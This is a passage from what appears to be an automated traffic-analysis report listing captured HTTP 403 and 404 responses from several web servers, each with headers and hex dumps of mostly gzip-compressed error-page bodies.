72 3f ba 6c c5 2e 2f 96 6e 24 6e 8b 48 05 d3 ae 29 4b 58 e6 d1 48 66 d2 48 83 b6 7a 0f ea 6a d2 32 46 6c 8f eb 0c 6c e3 4c d3 34 6d 66 ea 43 48 d2 85 65 b4 0f c4 ba 23 ca 89 86 ba 95 35 ac c8 ee 16 e6 f5 49 79 42 e9 f6 2c a0 d1 ea 4e 63 b2 48 23 15 f6 a7 2d 1f f0 41 e7 43 0a 39 d4 1f d0 4f 5b a3 2d f0 d2 e0 3c 77 4b 9a 24 ef 11 92 f3 4b b7 3f 09 f6 93 80 97 cb 99 8f d4 7a 94 35 7f 72 aa 1c 8f e8 12 bf f3 84 a3 74 df d2 31 df 1c c3 1f 53 70 88 2b a8 d0 cb 51 95 db 13 23 76 55 c3 65 35 c6 5b 69 b5 eb cc 50 35 e5 bd b4 b3 96 d2 18 b6 cc 2f 02 03 19 a6 f6 2e 80 e7 01 0c 54 f1 74 ea 0e 7c d4 95 34 33 98 56 2b 65 a6 dc c0 26 0f 4e 56 83 3c bd 97 6e 54 37 44 19 bb c0 5b 08 81 a4 9b 84 3e 72 3b 0e 7f 5f 88 10 0f 06 36 8b b3 f4 14 44 da 0d f3 60 d6 d9 10 0e 0d 40 cc 58 e3 61 bb ce 9a 18 dd 4a 08 08 91 0a 24 2f 73 1c e4 11 bd e3 15 29 40 fc 08 67 3a 62 37 a4 d0 f8 c9 1b 0c b1 96 11 bd 90 21 40 0c e3 ba 20 2a 6c 89 70 1e 10 6d 5e 85 f0 74 b7 be c8 cf cf f3 ef 32 26 06 2c 85 68 40 2a fa 2c 4a 54 87 14 2a 94 de 31 ad d6 59 ba 30 1b 8b 5a a9 2d ab 0c 8d 5e 67 13 86 6c 3a e5 6c ea 98 b2 a1 2b 43 e5 b5 4b cc bf e9 b5 aa e1 58 59 34 e7 9b 67 ec 57 e8 d9 6b b2 f4 2b 4f 7c b1 6b e2 94 20 9c 1f 4b 2e 36 cf 07 c4 ec 9a 10 3f a2 d4 c5 94 62 d3 ba c2 dd 02 49 85 e9 b2 37 89 ce 90 6d 0a 79 42 61 20 0e fb be cf 8f cc e4 d4 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:54:25 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b 0e f3 bf e8 bd 74 d3 02 69 74 6d 39 8d 6c c3 8a 55 a4 0a f8 b1 45 e9 e0 8c 3c ac d8 d6 c0 04 fd 6d 17 a2 de 1e f8 a4 df dd 7a 52 86 37 a0 eb 86 e2 e7 cb e5 ae 19 56 e5 53 ed b4 2d cd a2 f4 5d 50 b2 8b c8 9e 7c 39 06 9d 54 6a e0 64 39 fe 4e ec f3 01 e4 bd 75 72 3f ba 6c c5 2e 2f 96 6e 24 6e 8b 48 05 d3 ae 29 4b 58 e6 d1 48 66 d2 48 83 b6 7a 0f ea 6a d2 32 46 6c 8f eb 0c 6c e3 4c d3 34 6d 66 ea 43 48 d2 85 65 b4 0f c4 ba 23 ca 89 86 ba 95 35 ac c8 ee 16 e6 f5 49 79 42 e9 f6 2c a0 d1 ea 4e 63 b2 48 23 15 f6 a7 2d 1f f0 41 e7 43 0a 39 d4 1f d0 4f 5b a3 2d f0 d2 e0 3c 77 4b 9a 24 ef 11 92 f3 4b b7 3f 09 f6 93 80 97 cb 99 8f d4 7a 94 35 7f 72 aa 1c 8f e8 12 bf f3 84 a3 74 df d2 31 df 1c c3 1f 53 70 88 2b a8 d0 cb 51 95 db 13 23 76 55 c3 65 35 c6 5b 69 b5 eb cc 50 35 e5 bd b4 b3 96 d2 18 b6 cc 2f 02 03 19 a6 f6 2e 80 e7 01 0c 54 f1 74 ea 0e 7c d4 95 34 33 98 56 2b 65 a6 dc c0 26 0f 4e 56 83 3c bd 97 6e 54 37 44 19 bb c0 5b 08 81 a4 9b 84 3e 72 3b 0e 7f 5f 88 10 0f 06 36 8b b3 f4 14 44 da 0d f3 60 d6 d9 10 0e 0d 40 cc 58 e3 61 bb ce 9a 18 dd 4a 08 08 91 0a 24 2f 73 1c e4 11 bd e3 15 29 40 fc 08 67 3a 62 37 a4 d0 f8 c9 1b 0c b1 96 11 bd 90 21 40 0c e3 ba 20 2a 6c 89 70 1e 10 6d 5e 85 f0 74 b7 be c8 cf cf f3 ef 32 26 06 2c 85 68 40 2a fa 2c 4a 54 87 14 2a 94 de 31 ad d6 59 ba 30 1b 8b 5a a9 2d ab 0c 8d 5e 67 13 86 6c 3a e5 6c ea 98 b2 a1 2b 43 e5 b5 4b cc bf e9 b5 aa e1 58 59 34 e7 9b 67 ec 57 e8 d9 6b b2 f4 2b 4f 7c b1 6b e2 94 20 9c 1f 4b 2e 36 cf 07 c4 ec 9a 10 3f a2 d4 c5 94 62 d3 ba c2 dd 02 49 85 e9 b2 37 89 ce 90 6d 0a 79 42 61 20 0e fb be cf 8f cc e4 d4 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:54:28 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-store, no-cache, must-revalidateUpgrade: h2,h2cConnection: UpgradeVary: Accept-EncodingContent-Encoding: gzipX-Newfold-Cache-Level: 2X-Endurance-Cache-Level: 2X-nginx-cache: WordPressContent-Length: 1168Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 a5 52 5d 6f db 36 14 7d 8e 7f 05 ab 61 7d 18 46 d1 c9 d2 61 70 64 17 5d 37 ac 03 d6 ad 58 06 14 7b 2a 28 f1 5a 62 43 f1 72 24 65 d9 1d fa df 77 a9 0f c7 49 da a1 eb 84 04 92 ef e7 b9 e7 9c e2 d1 0f bf 3d ff e3 cf 57 3f b2 26 b6 66 b3 28 d2 8b 19 69 eb 75 e6 22 ff fe f7 6c b3 38 2b 1a 90 8a de 67 45 0b 51 32 2b 5b 58 67 3b 0d bd 43 1f 33 56 a1 8d 60 e3 3a eb b5 8a cd 5a c1 4e 57 c0 87 1f d9 fd 2e 8f 25 c6 70 d2 63 51 5b 05 fb af 99 c5 2d 1a 83 7d c6 c4 d0 14 75 34 b0 79 09 1d 0b 3a 02 7b dc 2a 19 9a 2b f6 1c 5b 6d 6b 76 8d 68 0b 31 d6 a4 ea 50 79 ed 22 0b be 5a 67 4d 8c 6e 25 04 84 e8 c1 48 5e e6 68 8d b6 20 7a c7 b5 ad 4c a7 20 88 b7 f4 f7 57 07 fe 30 bd f2 b7 21 db 14 62 1c 33 4e 8c 07 03 2c 1e 1c a1 8e b0 8f a2 0a 54 f2 15 fb 7b c1 e8 29 71 cf 83 7e 47 50 56 f4 ed 15 78 4e a1 ab 21 c7 5b 7c c7 ff b5 a0 87 f2 46 c7 8f d6 bc 5f 2c 4a 54 87 79 95 ac 6e 6a 8f 9d 55 bc 42 83 7e c5 fa 86 18 19 47 4d 91 d2 50 d1 18 c1 1d f8 2d f1 c8 f7 2b d6 68 a5 c0 8e f1 56 fa 5a db 15 5b 0e f3 bf e8 bd 74 d3 02 69 74 6d 39 8d 6c c3 8a 55 a4 0a f8 b1 45 e9 e0 8c 3c ac d8 d6 c0 04 fd 6d 17 a2 de 1e f8 a4 df dd 7a 52 86 37 a0 eb 86 e2 e7 cb e5 ae 19 56 e5 53 ed b4 2d cd a2 f4 5d 50 b2 8b c8 9e 7c 39 06 9d 54 6a e0 64 39 fe 4e ec f3 01 e4 bd 75 72 3f ba 6c c5 2e 2f 96 6e 24 6e 8b 48 05 d3 ae 29 4b 58 e6 d1 48 66 d2 48 83 b6 7a 0f ea 6a d2 32 46 6c 8f eb 0c 6c e3 4c d3 34 6d 66 ea 43 48 d2 85 65 b4 0f c4 ba 23 ca 89 86 ba 95 35 ac c8 ee 16 e6 f5 49 79 42 e9 f6 2c a0 d1 ea 4e 63 b2 48 23 15 f6 a7 2d 1f f0 41 e7 43 0a 39 d4 1f d0 4f 5b a3 2d f0 d2 e0 3c 77 4b 9a 24 ef 11 92 f3 4b b7 3f 09 f6 93 80 97 cb 99 8f d4 7a 94 35 7f 72 aa 1c 8f e8 12 bf f3 84 a3 74 df d2 31 df 1c c3 1f 53 70 88 2b a8 d0 cb 51 95 db 13 23 76 55 c3 65 35 c6 5b 69 b5 eb cc 50 35 e5 bd b4 b3 96 d2 18 b6 cc 2f 02 03 19 a6 f6 2e 80 e7 01 0c 54 f1 74 ea 0e 7c d4 95 34 33 98 56 2b 65 a6 dc c0 26 0f 4e 56 83 3c bd 97 6e 54 37 44 19 bb c0 5b 08 81 a4 9b 84 3e 72 3b 0e 7f 5f 88 10 0f 06 36 8b b3 f4 14 44 da 0d f3 60 d6 d9 10 0e 0d 40 cc 58 e3 61 bb ce 9a 18 dd 4a 08 08 91 0a 24 2f 73 1c e4 11 bd e3 15 29 40 fc 08 67 3a 62 37 a4 d0 f8 c9 1b 0c b1 96 11 bd 90 21 40 0c e3 ba 20 2a 6c 89 70 1e 10 6d 5e 85 f0 74 b7 be c8 cf cf f3 ef 32 26 06 2c 85 68 40 2a fa 2c 4a 54 87 14 2a 94 de 31 ad d6 59 ba 30 1b 8b 5a a9 2d ab 0c 8d 5e 67 13 86 6c 3a e5 6c ea 98 b2 a1 2b 43 e5 b5 4b cc bf e9 b5 aa e1 58 59 34 e7 9b 67 ec 57 e8 d9 6b b2 f4 2b 4f 7c b1 6b e2 94 20 9c 1f 4b 2e 36 cf 07 c4 ec 9a 10 3f a2 d4 c5 94 62 d3 ba c2 dd 02 49 85 e9 b2 37 89 ce 90 6d 0a 79 42 61 20 0e fb be cf 8f cc e4 d4 20
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Oct 2024 16:56:26 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XVKLD69Hnyy%2BdZ7o1AFUVnaVUCHjQy1SxSeZsk5%2F50Lk6bY9tMRMOL6CEJM8cmf%2BY5CQeGhezmipc6d6Y5fS02CDWSTn%2Fhc9RmLY%2FWF1oqAMpzqGR2fbeyQacGIbLCDJ%2BT2YFDeV%2Bt4%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7342ac88594314-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=95470&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=820&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 63 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec Data Ascii: 58cVmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,Z-Itf~ZI8Ratink
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Oct 2024 16:56:29 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eiVmhfPeYp1S7Ho30%2BJwqzBfwRuAQvSoMWOfrMHRV8rTfCaiYrc7ViKBM8xQUTH1s3btQNS1DDF25nzL%2BZO%2BIuUyey%2F%2BpS2pvectLPiAT48uw0ptVfSfSuMD1Pfyuf08iWFw73QDnlw%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7342bcfab64338-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=94602&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=840&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 Data Ascii: 581Vmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,Z-Itf~ZI8RatinkV
    Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 23 Oct 2024 16:56:32 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cOO3Xz7s0rOdztK0PpduxCIKD0KT1fF6nhIQHP5HjXUVae93kNcLcDhxFGpGgMI9Q1w25%2Fw4gVSUl85a73xVW9oaegZW4UbPMYRzwXMR8bpcxGOdQ5l7jYKrg2CPFqgclVAZnrEDuUg%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7342cd5df1726b-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=94252&sent=7&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7989&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 35 38 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 8c 56 6d 6f db 36 10 fe ee 5f 71 73 50 60 1b 6c c9 e9 4b 30 38 b2 81 2e 4d d6 00 5d 53 a4 69 87 7e 2a 28 f1 24 b1 a1 48 95 3c d9 71 83 02 f9 1b 05 b6 3f 97 5f 32 1c 29 b9 76 d6 0f 43 80 48 22 ef 8e cf dd f3 f0 ce d9 4f 2f 2e 4e ae 3e bc 39 85 9a 1a bd 1c 65 fc 00 2d 4c b5 18 a3 19 f3 02 0a b9 1c 01 64 0d 92 80 9a a8 9d e2 e7 4e ad 16 e3 c2 1a 42 43 53 da b4 38 86 fe 6b 31 26 bc a1 94 c3 1c 43 51 0b e7 91 16 1d 95 d3 df c6 df a3 18 d1 e0 62 ec 6c 6e c9 ef 78 be be 78 7d 3a 79 7d f1 fc f2 e4 e5 f9 fb d3 68 4f 8a 34 2e 9f ce 9e c0 99 75 b9 92 12 4d 96 c6 45 de f6 b4 d1 08 8c a0 3f b8 f0 3e 38 42 48 08 7e 85 5b 68 85 94 ca 54 f3 d9 31 34 c2 55 ca f0 db d7 60 93 5b b9 d9 b3 39 9c b5 37 f0 78 d6 de 3c b0 78 10 67 67 ef 16 4a 6b 68 ee 1b a1 35 78 61 fc d4 a3 53 e5 31 e4 a2 b8 ae 9c ed 8c 9c 1f 20 e2 31 14 56 5b 37 3f 98 cd f6 02 2c a5 5a c1 2d e4 d6 49 74 d3 dc 12 d9 66 7e d8 de 80 b7 5a 49 38 90 52 0e e6 f5 61 7f da 74 8d aa aa 69 6e ac 6b 84 1e d2 1a 9c 93 a7 d8 ec b8 f8 56 98 c1 cf ab 2f 38 3f 9a Data Ascii: 581Vmo6_qsP`lK08.M]Si~*($H<q?_2)vCH"O/.N>9e-LdNBCS8k1&CQblnxx}:y}hO4.uME?>8BH~[hT14U`[97x<xggJkh5xaS1 1V[7?,Z-Itf~ZI8RatinkV/8?
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 23 Oct 2024 16:56:34 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeX-Frame-Options: DENYX-Content-Type-Options: nosniffReferrer-Policy: same-originCross-Origin-Opener-Policy: same-origincf-cache-status: DYNAMICvary: accept-encodingReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cTmoVit02TFPilnQKTr2EByKt%2B1zJLpLTJDBT541C%2BgYrd1DHfxQ67%2F%2BIdgSzSMvjXBSXfRmD%2BCOM3lbgWuvhOshphDRlGDLfZaFs8ZonY0xaW36udXnGqsoK1vQu%2BXjskTSrGk5Gs0%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8d7342ddcdf30cc8-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=95266&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=539&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 63 39 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 61 74 20 2f 72 66 75 6f 2f 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 4f 4e 45 2c 4e 4f 41 52 43 48 49 56 45 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 20 20 68 74 6d 6c 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 30 3b 20 6d 61 72 67 69 6e 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 31 30 70 78 20 32 30 70 78 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 2a 20 2a 20 7b 20 70 61 64 64 69 6e 67 3a 30 3b 20 7d 0a 20 20 20 20 62 6f 64 79 20 7b 20 66 6f 6e 74 3a 73 6d 61 6c 6c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 62 61 63 Data Ascii: c9b<!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <title>Page not found at /rfuo/</title> <meta name="robots" content="NONE,NOARCHIVE"> <style type="text/css"> html * { padding:0; margin:0; } body * { padding:10px 20px; } body * * { padding:0; } body { font:small sans-serif; bac
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 23 Oct 2024 16:56:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeContent-Encoding: gzipData Raw: 64 31 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cd 5a 6b 6f 1b c7 15 fd ee 5f 31 66 01 91 b4 b9 bb 51 52 04 b6 45 52 79 38 fd 94 47 01 39 2d 0a 45 21 86 cb 11 b9 e6 72 77 bb bb 94 4c db 02 12 3b 69 12 c4 88 d1 34 40 81 a0 45 5f 28 fa a9 80 fc 50 a3 f8 a1 fc 85 dd 7f d4 73 ef ec 2e 97 14 29 3f e2 14 15 20 89 9c 9d b9 73 e7 de 73 cf bd 33 b3 cd d3 3d df 8e 27 81 12 83 78 e4 b6 9b f4 57 d8 ae 8c a2 56 c5 89 3a b2 27 83 d8 d9 51 15 e1 4a af df aa 84 e3 0a fa 28 d9 6b 37 47 2a 96 c2 1e c8 30 52 71 ab f2 fe a5 5f 18 e7 f0 8c 5b 3d 39 52 ad 4a 20 c3 a1 e3 f5 2b c2 f6 bd 58 79 e8 14 aa 7e 38 36 42 c8 9c ed b9 e3 a8 dd c0 0f e3 52 d7 5d a7 17 0f 5a 3d b5 e3 d8 ca e0 2f 0d c7 73 62 47 ba 46 64 4b 57 b5 56 21 22 76 62 57 b5 77 77 77 4d d7 b1 07 de 64 12 fa 51 6c fa 9e eb 78 aa 69 e9 a7 4d 7c 19 8a 50 b9 ad 4a 14 4f 5c 15 0d 94 c2 44 23 d5 73 64 ab 22 5d b7 22 06 a1 da 2e d4 65 f5 0c 39 8e 7d d3 8e 22 4c 32 1d ef 60 21 79 ef 6d 09 cd 7c cf c4 9f f5 d5 8a 20 0b c2 60 23 d9 57 d6 15 83 3b b6 9b 91 1d 3a 41 dc b6 ce 34 4f 6f be 79 f1 f5 4b af 6f 9e b1 4e ed 3a 5e cf df 35 e3 50 da c3 0d ee f0 b6 2f 7b a2 25 b6 c7 9e 1d 3b be 57 ab 5f db 5b 3b 65 9d d9 da 6a 9f b1 9a 56 26 24 13 26 b0 38 74 6f 55 16 8b a9 55 ad 91 f4 9c 6d 05 33 5c 8e aa f5 0a fa ab 30 f4 c3 a7 1c d0 10 ab 18 13 85 76 ab 52 16 04 bf e4 7e 1e c7 db ec e7 67 d6 8b 40 03 d7 91 45 a2 a7 d6 6d 7e 50 59 bf b9 67 27 e9 68 69 c4 76 fd de 24 c7 76 d7 08 e0 2b a1 ff 75 c8 7d 9d 0c af dc c6 c8 9d 7e ea 74 fb 1d d7 e9 0f 62 e0 81 64 a9 b0 2c 87 3b 77 3a d9 03 12 39 d3 a2 a5 67 a8 ef 39 3b 4b 87 1a 9e 1f 93 4a b1 ba 82 89 92 6f 92 a3 e4 51 72 90 3c 16 c9 77 c9 7e fa 11 3e de 4b 0e d3 8f d3 1b f8 7c 88 df a3 e4 6e b2 4f 8f ef ae 78 dd 28 58 6b 22 1e 75 e4 76 0d 42 6d 8e d5 41 1c 07 d1 05 cb 42 f8 99 08 60 1d 0c 9e bf ed bb ae bf 2b 3c df 0f 14 50 82 0f 88 03 a0 45 85 c0 b3 0c fb 14 d6 9d 2e e2 7e 08 65 fe 4a b3 9b e9 47 e9 cd a6 25 db 4d 0b eb 68 37 e7 16 d3 57 9d 4e 16 eb c6 6e 28 83 00 42 33 03 cf b7 77 38 16 3b 88 05 10 c3 d2 4e ec 96 01 62 1a 34 62 44 b1 8c 1d 1b 0e 98 9b 75 c6 d6 46 36 3f f9 69 75 6a 8d 39 8f 18 4c 0d 95 a5 cc 31 58 6d 37 83 e5 a3 7b 4a e3 18 c1 fa ec de 6a 76 c3 76 72 a8 1d 96 fc 40 9e 4c 7e 60 ef 3e 38 e6 cf 19 a3 07 cb 16 de 1d c7 b1 ef 45 b9 c5 b1 f2 12 0c f4 43 68 a9 3f c0 0d ae 1f 76 d8 cf ca b3 09 6c d9 83 c8 b9 aa 3a 40 c0 48 ba ec 8e cc aa c5 f8 c2 82 59 7f 76 0d 78 b9 24 22 90 bd 1e 1c d5 71 09 3b f3 d8 23 92 d6 f8 b3 76 07 be 13 59 eb f6 40 d9 c3 d6 4a 8f 93 c5 62 0e 5f 91 a3 60 0d a3 3a 91 3f 0e 6d d5 ca 95 20 76 ae b4 7f 4d 72 08 8d a2 bc 62 0a 9e f2 0a 98 be 4b 31 79 f2 8a 7a fe 48 3a 05 c9 e7 81 53 52 5e 77 b0 3c b5 6b ad 8f e3 51 ae d9 12 fd a9 07 65 9a f1 28 d7 7d 85 9a 6c ac 4b 3a 7d af 15 c1 58 5e af 03 69 27 2f 35 f9 3b c0 f1 9f e4 40 a4 9f 26 47 e9 67 e9 4d 91 dc cf d9 e1 74 29 20 a3 40 7a 0
